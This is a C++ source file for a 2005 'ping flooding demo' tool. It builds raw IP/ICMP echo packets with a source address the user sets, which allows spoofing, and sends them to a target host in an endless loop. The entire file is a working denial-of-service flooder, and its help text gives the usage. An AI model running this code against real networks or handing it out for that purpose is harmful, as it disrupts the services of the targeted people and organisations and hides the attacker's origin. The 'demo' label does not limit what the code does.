
/***************************************************************************
 *  ping-flood.cc : This file is part of 'ping flood demo'
 *
 *  (c) 2005 by Lukasz Tomicki <tomicki@o2.pl>
 *	
 ****************************************************************************/

/*
 *  This program is free software; you can redistribute it and/or modify
 *  it under the terms of the GNU General Public License as published by
 *  the Free Software Foundation; either version 2 of the License, or
 *  (at your option) any later version.
 *
 *  This program is distributed in the hope that it will be useful,
 *  but WITHOUT ANY WARRANTY; without even the implied warranty of
 *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
 *  GNU Library General Public License for more details.
 *
 *  You should have received a copy of the GNU General Public License
 *  along with this program; if not, write to the Free Software
 *  Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
 */
 
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/time.h>
#include <signal.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netinet/ip_icmp.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <unistd.h>

typedef unsigned char u8;
typedef unsigned short int u16;
typedef unsigned int u32;

unsigned short in_cksum(unsigned short *ptr, int nbytes);
void help(const char *p);

unsigned long sent = 0;

int main(int argc, char **argv)
{
	if (argc < 3) {
		help(argv[0]);
		exit(0);
	}

	srand(getpid());
	unsigned long daddr;
	unsigned long saddr;
	u32 payload_size(0);
	
	daddr = inet_addr(argv[2]);
	saddr = inet_addr(argv[1]);
	if (argc > 3)
		payload_size = atoi(argv[3]);
	
	int sockfd = socket (AF_INET, SOCK_RAW, IPPROTO_TCP);
	if (sockfd < 0) {
		perror("socket");
		return (0);
	}
	
	int on = 1;
	if (setsockopt (sockfd, IPPROTO_IP, IP_HDRINCL, (const char*)&on, 
		sizeof (on)) == -1) {
		perror("setsockopt");
		return (0);
	}
	
	if (setsockopt (sockfd, SOL_SOCKET, SO_BROADCAST, (const char*)&on, 
		sizeof (on)) == -1) {
		perror("setsockopt");
		return (0);
	}	
	
	int packet_size = (sizeof (struct iphdr) +
				   sizeof (struct icmphdr) + payload_size) * sizeof (char);

	char *packet = (char *) malloc (packet_size);
				   
	if (!packet) {
		perror("setsockopt");
		close(sockfd);
		return (0);
	}
	
	struct iphdr *ip = (struct iphdr *) packet;
	struct icmphdr *icmp = (struct icmphdr *) (packet + sizeof (struct iphdr));

	memset (packet, 0, packet_size);

	ip->version = 4;
	ip->ihl = 5;
	ip->tot_len = htons (packet_size);
	ip->id = rand ();
	ip->ttl = 255;
	ip->protocol = IPPROTO_ICMP;
	ip->saddr = saddr;
	ip->daddr = daddr;
	ip->check = in_cksum ((u16 *) ip, sizeof (struct iphdr));

  	icmp->type = ICMP_ECHO;
  	icmp->un.echo.sequence = rand();
  	icmp->un.echo.id = rand();
  	icmp->checksum = in_cksum((u16 *)icmp, sizeof(struct icmphdr));
		
	sockaddr_in servaddr;
	servaddr.sin_family = AF_INET;
	servaddr.sin_addr.s_addr = daddr;
	memset(&servaddr.sin_zero, 0, sizeof (servaddr.sin_zero));

	puts("flooding...");
	
	bool run(true);
	while (run) {
		memset(packet + sizeof(struct iphdr) + sizeof(struct icmphdr), 
			rand() % 255, payload_size);
		if (sendto(sockfd, packet, packet_size, 0, 
			(const sockaddr*) &servaddr, sizeof (servaddr)) == -1) {
			perror("send");
			printf("(%d packets have been sent)\n", sent);
			run = false;
			continue;
		}
		++sent;
	}
	free(packet);
	close(sockfd);
	
	return (0);
}

unsigned short in_cksum(unsigned short *ptr, int nbytes)
{
	register long sum;
	u_short oddbyte;
	register u_short answer;

	sum = 0;
	while (nbytes > 1) {
		sum += *ptr++;
		nbytes -= 2;
	}

	if (nbytes == 1) {
		oddbyte = 0;
		*((u_char *) & oddbyte) = *(u_char *) ptr;
		sum += oddbyte;
	}

	sum = (sum >> 16) + (sum & 0xffff);
	sum += (sum >> 16);
	answer = ~sum;

	return (answer);
}

void help(const char *p)
{
	puts("ping flooding demo v0.1");
	puts("(c) 2005 by Lukasz Tomicki <tomicki@o2.pl>");
	printf("  usage: %s <source IP> <destination IP> [payload size]\n", p);
}
